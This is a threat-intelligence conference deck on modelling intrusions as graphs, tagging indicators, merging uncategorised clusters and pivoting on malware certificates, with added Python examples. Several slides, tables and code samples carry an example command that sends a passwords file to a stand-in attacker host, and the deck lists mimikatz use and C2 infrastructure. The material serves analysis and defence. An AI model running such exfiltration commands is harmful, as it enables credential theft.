CONFidence 2018: Everything’s Connected aka Threat Intelligence 102
Marcin Siedlarz
TORE Advanced Practices – Adversary Pursuit
FireEye
About me, the preso and the motivation

©2018 FireEye | Private & Confidential
About me
• 9 years of experience in incident response and technical analysis of some of the most prolific and advanced cyber threats
• CN/RU threat groups targeting PL gov
• Contributing author to the Dragonfly research and whitepaper
• Research of various APTs at FireEye
Leonardo da Vinci
"Realize that everything connects to everything else."
Intelligence objectives
Intelligence Objectives & Principles
Reduce uncertainty
Knowledge that is:
• Accurate
• Timely
• Relevant
Knowledge about:
• The threat
• Surrounding environment
• Visibility on threat actors, exploits, and malware
• Tactical: TTPs, indicators, artifacts
• Strategic: TTPs over time, industries targeted, data stolen, analysis of motivations and who benefits, attacker infrastructure
• Attribution capability
Attribution capability
(diagram: Incident1 with IOC, IOC; Incident2 with IOC, IOC; Incident3 with IOC)

Attribution capability
(diagram: IOCs, TTPs, APTx)
Let’s track... The cars!

Node properties:
• car: VIN, color, manufacturing date
• reg plate: number, reg date
• person: first name, surname, birthdate

Nodes: car, reg plate, person
Edges: carhasreg (car → reg plate), personhascar (person → car)
Queries:
• All red cars manufactured in 2012
• All red cars belonging to a male 21-25 yrs old, sedan, registration plate starts with "W"
Cyber threat data model

Example nodes and edges (malware comms)
Nodes: file, fqdn, ipv4srv, url
Edges: rundnslookup (file → fqdn), runconnect (file → ipv4srv), rungeturl (file → url)

Example nodes and edges (hostops)
Nodes: host, file
Edges: hostcmd, fsrefs, latmove, orghostcmd

Example nodes and edges (spear-phishing)
Nodes: email, file, url
Edges: sentemail (email → file), emailto (file → email), subfile (file → file), filedocs (file → url)
Example nodes and edges (spear-phishing), with aspects
• email: bhv/meth.phish.sender
• file: bhv/meth.phish.msg
• email: bhv/meth.phish.vic
• file: bhv/meth.phish.payload
• file: bhv/meth.phish.body
• url: bhv/meth.phish.payload
Edges: sentemail, emailto, subfile, filedocs
Aspects -> Context

aspect                    description
bhv/meth.phish.sender     An address that has been used to send a phishing message
bhv/meth.phish.msg        A phishing email message (or relevant headers)
bhv/meth.phish.vic        The recipient or intended target of a phishing email
bhv/meth.phish.payload    Code attached or linked to the phishing email
bhv/meth.phish.body       The body of a phishing email, typically parsed out from the rfc822 message
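The two data models above (the car graph with its two queries, and the spear-phishing nodes, edges and bhv/meth.phish aspects) can be exercised with a small property graph. The following is an added example, not FireEye's or Synapse's code: node forms, edge verbs and tag names are taken from the slides, while the Graph class, the sample records, the 2018-05-01 reference date used for ages and the extra car properties body and sex are assumptions made for this example. Tags are stored together with all their prefixes, so "tagged anywhere under bhv/meth.phish" is a single set lookup, and both slide queries become property filters plus edge walks.

```python
"""Property graph with typed nodes, labelled edges and hierarchical tags (aspects).

Added example, not FireEye's or Synapse's code. Node forms, edge verbs and tag names follow
the slides; the Graph API, the sample records, the 2018-05-01 reference date for ages and the
car properties body/sex are constructed for this example.
"""
from collections import defaultdict
from datetime import date


def tag_prefixes(tag):
    """'bhv/meth.phish.sender' -> ['bhv', 'bhv/meth', 'bhv/meth.phish', 'bhv/meth.phish.sender']."""
    return [tag[:i] for i, ch in enumerate(tag) if ch in "/."] + [tag]


class Graph:
    def __init__(self):
        self.nodes = {}                  # node id -> (form, props, tags)
        self.edges = defaultdict(list)   # (src id, verb) -> [dst ids]

    def add(self, nid, form, **props):
        self.nodes[nid] = (form, props, set())

    def link(self, src, verb, dst):
        self.edges[(src, verb)].append(dst)

    def tag(self, nid, *tags):
        # Every prefix is stored, so "tagged anywhere under bhv/meth.phish" is one set lookup.
        for t in tags:
            self.nodes[nid][2].update(tag_prefixes(t))

    def out(self, nid, verb):
        return self.edges.get((nid, verb), [])

    def props(self, nid):
        return self.nodes[nid][1]

    def find(self, form, pred=lambda p: True):
        return sorted(n for n, (f, p, _) in self.nodes.items() if f == form and pred(p))

    def tagged(self, prefix):
        return sorted(n for n, (_, _, t) in self.nodes.items() if prefix in t)


def build_car_graph():
    """Constructed cars, plates and owners following the slide's car / reg plate / person model."""
    g = Graph()
    cars = [("car:1", "red", "2012-04-10", "sedan", "WA12345"), ("car:2", "red", "2012-09-01", "suv", "KR99999"),
            ("car:3", "red", "2015-01-20", "sedan", "WE55555"), ("car:4", "blue", "2012-02-14", "sedan", "WX11111")]
    for nid, color, mfg, body, plate in cars:
        g.add(nid, "car", vin="VIN-" + nid[-1], color=color, mfg=mfg, body=body)
        g.add("reg:" + plate, "regplate", number=plate, regdate=mfg)   # regdate constructed (= mfg date)
        g.link(nid, "carhasreg", "reg:" + plate)
    g.add("person:1", "person", first="Jan", surname="Kowalski", birth="1995-03-01", sex="male")
    g.add("person:2", "person", first="Anna", surname="Nowak", birth="1994-07-20", sex="female")
    for person, car in [("person:1", "car:1"), ("person:1", "car:3"), ("person:2", "car:2")]:
        g.link(person, "personhascar", car)
    return g


def age_on(birth, ref):
    b = date.fromisoformat(birth)
    return ref.year - b.year - ((ref.month, ref.day) < (b.month, b.day))


def red_cars_made_in(g, year):
    """Slide query 1: all red cars manufactured in the given year."""
    return g.find("car", lambda p: p["color"] == "red" and p["mfg"].startswith(str(year)))


def red_sedans_of_young_men(g, ref=date(2018, 5, 1)):
    """Slide query 2: red sedans owned by a male aged 21-25 whose registration plate starts with W."""
    hits = set()
    for person in g.find("person", lambda p: p["sex"] == "male"):
        if not 21 <= age_on(g.props(person)["birth"], ref) <= 25:
            continue
        for car in g.out(person, "personhascar"):
            p, plates = g.props(car), [g.props(r)["number"] for r in g.out(car, "carhasreg")]
            if p["color"] == "red" and p["body"] == "sedan" and any(n.startswith("W") for n in plates):
                hits.add(car)
    return sorted(hits)


def build_phish_graph():
    """Spear-phishing chain from the slides; victim address, message and macro file names are constructed."""
    g = Graph()
    g.add("email:sender", "email", addr="foobarsender@yahoo.com")
    g.add("email:vic", "email", addr="victim@example.com")
    g.add("file:msg", "file", basename="message.eml")
    g.add("file:xls", "file", basename="Payroll 2018.xls")
    g.add("file:macro", "file", basename="macro.vbs")
    g.add("url:dl", "url", url="https://foobarxyz.com/foo.exe")
    for src, verb, dst in [("email:sender", "sentemail", "file:msg"), ("file:msg", "emailto", "email:vic"),
                           ("file:msg", "subfile", "file:xls"), ("file:xls", "subfile", "file:macro"),
                           ("file:macro", "filedocs", "url:dl")]:
        g.link(src, verb, dst)
    g.tag("email:sender", "bhv/meth.phish.sender")
    g.tag("file:msg", "bhv/meth.phish.msg")
    g.tag("email:vic", "bhv/meth.phish.vic")
    g.tag("file:xls", "bhv/meth.phish.payload", "sig/mal.foobar", "bhv/meth.fileops.macro")
    g.tag("file:macro", "sig/mal.foobar", "bhv/meth.codelang.vbscript", "bhv/role.macro")
    g.tag("url:dl", "sig/mal.foobar")
    return g
```

With the phishing graph built, `tagged("bhv/meth.phish")` returns the sender, victim, message and attachment nodes but not the macro (its tags sit under bhv/meth.codelang and bhv/role), while `tagged("sig/mal.foobar")` crosses node types and returns the attachment, the macro and the download URL; that second query is the one an analyst runs to see everything a signature has touched before pivoting further.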
Aspects -> Context (bhv/meth)
bhv
  meth
    phish: vic, sender, body, payload
    fileops: macro, obf
    hostops: wipe, datamine

Aspects -> Context (bhv/capa)
bhv/capa
  c2: twitter, github
  crypt: aes128, rc4
  datamine: keylog, screen, files

Aspects -> Context (sig)
sig/
  cve: 2017, 2018
  exploit
  mal: sogu, zxshell
Example nodes and edges (spear-phishing), worked through
• file: file:basename = "Payroll 2018.xls"
  +bhv/meth.phish.payload
  +sig/mal.foobar
  +bhv/meth.fileops.macro
• file
  +sig/mal.foobar
  +bhv/meth.codelang.vbscript
  +bhv/role.macro
• url: url = "https://foobarxyz.com/foo.exe"
  +sig/mal.foobar

Example nodes and edges (spear-phishing)
• url: url = "https://foobarxyz.com/foo.exe", +sig/mal.foobar
• fqdn: foobarxyz.com
• email: foobar@example.com
• ipv4addr: 1.2.3.4
• file: file:basename = foo.exe
  +sig/mal.foobar
  +code/foobar
  +bhv/role.backdoor
  +bhv/capa.comms.http
  +bhv/capa.cmd.exec

Example nodes and edges (spear-phishing)
• file: foo.exe
• url: url = "https://c2domain.com/foo.php", +sig/mal.foobar
• fqdn: fqdn = "c2domain.com", +sig/mal.foobar
• host
• file: file:base = meow.exe, +code/mimikatz

Example nodes and edges (spear-phishing)
• host
• file: file:base = meow.exe, +code/mimikatz
• file: file:base = passwords.txt, fs:rawpath = C:\xyz\passwords.txt, +trend/exfil.creds.hash
• hostcmd: ping evil.zy1.xyz
• hostcmd: foo.exe –send passwords.txt evil.zy1.xyz:8001
  +bhv/meth.exfil
  +sig/mal.foobar
+thr / +apt
• Most important aspect tree
• Represents the analytical assessment that an indicator is used by a threat group
• Several considerations
  – Less rigid attribution framework == more attribution mistakes
  – Analytic confidence
  – Correlation value
  – Bias
We should be handing out UNCs like candy

apt/
  apt1
  apt2
  aptx
  unc1
  unc2
unc1 + unc2

node                                            sig           bhv                 apt
foobarsender@yahoo.com                                        meth.phish.sender   unc1
Payroll 2018.xls                                mal.foobar    meth.phish.payload  unc1
foobarxyz.com                                   mal.foobar                        unc1
foo.exe                                         mal.foobar    role.backdoor       unc1
c2domain.com                                    mal.foobar                        unc1
meow.exe                                        rel.mimikatz                      unc1
foo.exe –send passwords.txt evil.zy1.xyz:8001   mal.foobar    meth.exfil          unc1

node                                            sig           bhv                 apt
random@mail.com                                               meth.phish.sender   unc2
Job offer.docx                                  mal.foobar    meth.phish.payload  unc2
barfooabc.com                                   mal.foobar                        unc2
abc.exe                                         mal.foobar    role.backdoor       unc2
random.com                                      mal.foobar                        unc2
mimi.exe                                        rel.mimikatz                      unc2
foo.exe –send passwords.txt evil.zy1.xyz:8001   mal.foobar    meth.exfil          unc2

The last row is the same exfil command line already tagged unc1; it is now seen in the second cluster and tagged unc2 as well.

Overlaps
Trait                     Example                 Overlap conf. level
Use of FOOBAR                                     Low
Use of same stagedir      C:\xyz\passwords.txt    Medium
Use of same exfil fqdn    evil.zy1.xyz            High
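The overlap table above can be produced mechanically from the two node tables. The following is an added example, not FireEye's tooling: the node values and tags are the ones in the unc1 and unc2 tables, the unc2 stage file record is implied by the overlap table rather than listed on the slide, and the trait extractors, the confidence level attached to each trait and the merge threshold are assumptions made for this example. The point it makes is the one the slide makes: a shared malware family is a weak signal, while shared attacker-controlled infrastructure is a strong one.

```python
"""Overlap analysis between two uncategorised clusters (unc1, unc2).

Added example, not FireEye's tooling. Node values and tags come from the unc1/unc2 tables on
the slides; the trait extractors, per-trait confidence levels and merge threshold are
assumptions for this example, chosen to reproduce the slides' overlap table.
"""
import re

# Each record: (value, set of tags, extra properties). Values as printed on the slides.
UNC1 = [
    ("foobarsender@yahoo.com", {"meth.phish.sender"}, {}),
    ("Payroll 2018.xls", {"mal.foobar", "meth.phish.payload"}, {}),
    ("foobarxyz.com", {"mal.foobar"}, {}),
    ("foo.exe", {"mal.foobar", "role.backdoor"}, {}),
    ("c2domain.com", {"mal.foobar"}, {}),
    ("meow.exe", {"rel.mimikatz"}, {}),
    ("passwords.txt", {"trend/exfil.creds.hash"}, {"rawpath": r"C:\xyz\passwords.txt"}),
    ("foo.exe -send passwords.txt evil.zy1.xyz:8001", {"mal.foobar", "meth.exfil"}, {}),
]
UNC2 = [
    ("random@mail.com", {"meth.phish.sender"}, {}),
    ("Job offer.docx", {"mal.foobar", "meth.phish.payload"}, {}),
    ("barfooabc.com", {"mal.foobar"}, {}),
    ("abc.exe", {"mal.foobar", "role.backdoor"}, {}),
    ("random.com", {"mal.foobar"}, {}),
    ("mimi.exe", {"rel.mimikatz"}, {}),
    # Stage file for unc2: implied by the slide's overlap table, not listed in its node table.
    ("passwords.txt", {"trend/exfil.creds.hash"}, {"rawpath": r"C:\xyz\passwords.txt"}),
    ("foo.exe -send passwords.txt evil.zy1.xyz:8001", {"mal.foobar", "meth.exfil"}, {}),
]

LEVELS = ["Low", "Medium", "High"]


def malware_families(records):
    """sig/mal.* tags -> family names (mal.foobar -> FOOBAR)."""
    return {t.split(".", 1)[1].upper() for _, tags, _ in records for t in tags if t.startswith("mal.")}


def stage_dirs(records):
    return {props["rawpath"] for _, _, props in records if "rawpath" in props}


HOSTPORT = re.compile(r"\b([a-z0-9.-]+\.[a-z]{2,}):\d{1,5}\b", re.I)


def exfil_fqdns(records):
    """host:port tokens inside command lines tagged meth.exfil -> destination hostnames."""
    return {m.group(1).lower() for value, tags, _ in records if "meth.exfil" in tags
            for m in HOSTPORT.finditer(value)}


# (trait, extractor, confidence that sharing it means the same operator) - assumed levels
TRAITS = [
    ("Use of same malware family", malware_families, "Low"),   # tooling can be shared or bought
    ("Use of same stagedir", stage_dirs, "Medium"),            # operator habit
    ("Use of same exfil fqdn", exfil_fqdns, "High"),           # attacker-controlled infrastructure
]


def overlaps(a, b):
    """Traits present in both clusters, each with the shared example values and its level."""
    found = []
    for name, extract, level in TRAITS:
        shared = sorted(extract(a) & extract(b))
        if shared:
            found.append((name, ", ".join(shared), level))
    return found


def strongest(found):
    return max((level for _, _, level in found), key=LEVELS.index, default=None)


def merge_supported(found, threshold="High"):
    """Assumed rule: merge two UNCs only when the strongest shared trait reaches the threshold."""
    s = strongest(found)
    return s is not None and LEVELS.index(s) >= LEVELS.index(threshold)
```

Running `overlaps(UNC1, UNC2)` yields the three rows of the slide's table in order, and `merge_supported` answers True only because of the High-confidence exfil host; with just the family and stage directory overlaps it would answer False, which is the "less rigid framework == more attribution mistakes" consideration from the +thr / +apt slide expressed as code.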
SOC Intelligence Support
ZXSHELL ssl certificates
SSL client HELLO sig
78.189.98.__
122.252.228.__
213.5.55.__
80.69.180.__
119.47.69.__
14.55.203.__

ZXSHELL ssl certificates
-----BEGIN CERTIFICATE-----
(certificate body not preserved in this copy)
-----END CERTIFICATE-----
x509:serial=d9:be:00:43:b7:96:5c:48
(the six IPs above)

ZXSHELL ssl certificates
49.206.128.35  x509:serial=d9:be:00:43:b7:96:5c:48
pdns:
philippinenews.mooo.com
second.photo-frame.com
shoping.jumpingcrab.com

ZXSHELL ssl certificates
Source: https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/

ZXSHELL ssl certificates
80.69.180.__
27.106.22.__
14.35.248.__
139.162.55.__
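The pivot chain on the ZXSHELL slides (certificate serial, to the IPs that presented it, to the names passive DNS has seen on those IPs, and from a name onward to other IPs) is a breadth-first walk over enrichment sources, and the thing that keeps it useful is a hop limit. The following is an added example, not FireEye's tooling: the serial, the address 49.206.128.35 and its three passive-DNS names are the values printed on the slides, the masked "a.b.c.__" addresses are copied as the slides print them and used only as opaque keys, and every other record (198.51.100.9, 192.0.2.10, the second serial and their names) is constructed so that the hop limit has something to stop at.

```python
"""Hop-limited pivoting across enrichment sources: TLS certificate serial -> IPs -> passive DNS.

Added example, not FireEye's tooling. The serial, 49.206.128.35 and its three pDNS names are
from the slides; masked "a.b.c.__" addresses are copied as the slides print them; the other
addresses, the second serial and their names are constructed for this example.
"""
from collections import deque

SERIAL_ZXSHELL = "d9:be:00:43:b7:96:5c:48"
SSL_SERIAL_BY_IP = {                  # constructed TLS-scan view: which cert serial an IP presented
    "49.206.128.35": SERIAL_ZXSHELL,
    "78.189.98.__": SERIAL_ZXSHELL,
    "122.252.228.__": SERIAL_ZXSHELL,
    "213.5.55.__": SERIAL_ZXSHELL,
    "198.51.100.9": "00:aa:bb:cc:dd:ee:ff:01",   # constructed: a different certificate
}
PDNS = {                              # constructed passive DNS: ip -> names seen resolving to it
    "49.206.128.35": ["philippinenews.mooo.com", "second.photo-frame.com", "shoping.jumpingcrab.com"],
    "198.51.100.9": ["second.photo-frame.com"],  # constructed: the name later pointed elsewhere
    "192.0.2.10": ["unrelated.example"],         # constructed: must never be reached from the serial
}


def neighbours(kind, value):
    """One pivot step. Nodes are (kind, value) tuples with kind in serial / ip / fqdn."""
    if kind == "serial":
        return [("ip", ip) for ip, s in sorted(SSL_SERIAL_BY_IP.items()) if s == value]
    if kind == "ip":
        out = [("fqdn", n) for n in PDNS.get(value, [])]
        if value in SSL_SERIAL_BY_IP:
            out.append(("serial", SSL_SERIAL_BY_IP[value]))
        return out
    if kind == "fqdn":
        return [("ip", ip) for ip, names in sorted(PDNS.items()) if value in names]
    return []


def pivot(start, max_hops):
    """Breadth-first expansion from start; returns {node: path} for every node within max_hops.

    The path records how each indicator was reached, which is what an analyst needs in order
    to judge whether a hop went through attacker infrastructure or through shared hosting."""
    paths = {start: [start]}
    queue = deque([(start, 0)])
    while queue:
        node, depth = queue.popleft()
        if depth >= max_hops:
            continue
        for nxt in neighbours(*node):
            if nxt not in paths:
                paths[nxt] = paths[node] + [nxt]
                queue.append((nxt, depth + 1))
    return paths


def reached(paths, kind):
    """Sorted values of one kind in a pivot result."""
    return sorted(v for k, v in paths if k == kind)


if __name__ == "__main__":
    for hops in (2, 3, 4):
        result = pivot(("serial", SERIAL_ZXSHELL), hops)
        print(hops, reached(result, "ip"), reached(result, "fqdn"), reached(result, "serial"))
```

Two hops reproduce the slides: the four IPs that presented the certificate and the three names on 49.206.128.35. A third hop follows second.photo-frame.com to a different host, and a fourth pulls in that host's certificate; each extra hop is a place where a sinkhole, a parking IP or a shared hosting address would drag in unrelated indicators, so the depth is an analyst's decision per pivot rather than a default, and every node carries its path so that a weak hop can be cut out of the result.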
Launching your own CTI program

Key components of a TI program
4 DO's
• TI personnel:
  – Small team, even 1-2 analysts will do
  – RE capability in the TI or larger SOC team
• Technology stack that allows pushing signatures
  – snort
  – yara
• Pivoting and context creation
• Next steps:
  – graph database, proprietary <-> open-source (https://github.com/vertexproject/synapse)
Key components of a TI program
1 Don't
• Newscaster "threat intelligence", aka let's buy a bunch of feeds, combine them together and brief C-level executives
• Instead:
  – Focus on the data you already have (IR, SOC, external partnerships)
  – Get access to enrichment datasources (pdns, whois, ssl certificates)
  – Hunt for attacker activity
  – Tag and describe what you see
  – Pivot to find overlaps

Thank You
marcin.siedlarz@fireeye.com
@siedlmar(pl)
More Related Content

Similar to CONFidence 2018: Everything’s Connected aka Threat Intelligence 102 (Marcin Siedlarz)

One Technique, Two Techniques, Red Technique, Blue Technique
One Technique, Two Techniques, Red Technique, Blue TechniqueOne Technique, Two Techniques, Red Technique, Blue Technique
One Technique, Two Techniques, Red Technique, Blue TechniqueDaniel Weiss
 
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis Phil Tully
 
Making the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data VisibilityMaking the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data Visibilitydianadvo
 
27.2.14 lab isolate compromised host using 5-tuple
27.2.14 lab   isolate compromised host using 5-tuple27.2.14 lab   isolate compromised host using 5-tuple
27.2.14 lab isolate compromised host using 5-tupleFreddy Buenaño
 
Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Travis
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by  C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by  C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...CODE BLUE
 
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365Douglas Bienstock
 
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansEvolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansChristopher Korban
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxsanap6
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxinstaeditz009
 
27.2.15 lab investigating a malware exploit
27.2.15 lab   investigating a malware exploit27.2.15 lab   investigating a malware exploit
27.2.15 lab investigating a malware exploitFreddy Buenaño
 
106 Threat defense and information security development trends
106 Threat defense and information security development trends106 Threat defense and information security development trends
106 Threat defense and information security development trendsSsendiSamuel
 
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...Ping Identity
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDefCamp
 
AWS Security Week: Lacework - Automating Cloud Security at Scale
AWS Security Week: Lacework - Automating Cloud Security at ScaleAWS Security Week: Lacework - Automating Cloud Security at Scale
AWS Security Week: Lacework - Automating Cloud Security at ScaleAmazon Web Services
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™Katie Nickels
 
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Rahul Sasi
 
Pgatss slide deck june 7, 2018
Pgatss slide deck june 7, 2018Pgatss slide deck june 7, 2018
Pgatss slide deck june 7, 2018Greg Wartes, MCP
 

Similar to CONFidence 2018: Everything’s Connected aka Threat Intelligence 102 (Marcin Siedlarz) (20)

One Technique, Two Techniques, Red Technique, Blue Technique
One Technique, Two Techniques, Red Technique, Blue TechniqueOne Technique, Two Techniques, Red Technique, Blue Technique
One Technique, Two Techniques, Red Technique, Blue Technique
 
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
 
Making the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data VisibilityMaking the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data Visibility
 
27.2.14 lab isolate compromised host using 5-tuple
27.2.14 lab   isolate compromised host using 5-tuple27.2.14 lab   isolate compromised host using 5-tuple
27.2.14 lab isolate compromised host using 5-tuple
 
Threat Landscape Lessons from IoTs and Honeynets
Threat Landscape Lessons from IoTs and Honeynets Threat Landscape Lessons from IoTs and Honeynets
Threat Landscape Lessons from IoTs and Honeynets
 
Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by  C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by  C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
 
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
 
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansEvolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptx
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptx
 
27.2.15 lab investigating a malware exploit
27.2.15 lab   investigating a malware exploit27.2.15 lab   investigating a malware exploit
27.2.15 lab investigating a malware exploit
 
106 Threat defense and information security development trends
106 Threat defense and information security development trends106 Threat defense and information security development trends
106 Threat defense and information security development trends
 
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the Attacker
 
AWS Security Week: Lacework - Automating Cloud Security at Scale
AWS Security Week: Lacework - Automating Cloud Security at ScaleAWS Security Week: Lacework - Automating Cloud Security at Scale
AWS Security Week: Lacework - Automating Cloud Security at Scale
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
 
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
 
Pgatss slide deck june 7, 2018
Pgatss slide deck june 7, 2018Pgatss slide deck june 7, 2018
Pgatss slide deck june 7, 2018
 

Recently uploaded

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
